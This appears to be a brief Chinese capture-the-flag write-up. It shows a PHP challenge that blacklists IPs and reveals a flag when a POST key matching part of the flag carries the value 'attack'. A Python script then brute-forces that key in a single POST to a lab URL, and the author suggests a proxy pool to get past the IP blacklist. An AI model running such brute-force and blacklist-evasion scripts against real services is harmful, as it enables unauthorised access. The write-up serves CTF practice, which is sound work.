<?php
header(“content-type:text/html;charset=utf-8”);
show_source(__FILE__);
echo ‘<pre>’;
include(‘u/ip.php’);
include(‘flag.php’);
if (in_array($_SERVER[‘REMOTE_ADDR’],$ip)){
die(“您的ip已进入系统黑名单”);
}
var_dump($ip);
if ($_POST[substr($flag,5,3)]==’attack’){
echo $flag;
}else if (count($_POST)>0){
$ip = ‘$ip[]=”‘.$_SERVER[‘REMOTE_ADDR’].'”;’.PHP_EOL;
file_put_contents(‘u/ip.php’,$ip,FILE_APPEND);
}
echo ‘</pre>’;
array(0) {
}
POST的数据要为$flag的第6位到第9位,一般flag是flag{xxx12321}
且数据为attack
一次post最多为1000个数据
import requests
url="http://a47333e7d9d743a0b5951d2de698e921d1a1820fde514c99.game.ichunqiu.com/"
s='0123456789abcdef'
data={}
for i in s:
for j in s:
for k in s[3:6]:
data[i+j+k]='attack'
print(data)
r=requests.post(url,data=data)
print(r.text)
我发现重置容器后,flag会变….要开代理池,或者看运气
我只跑出来一次,自闭了…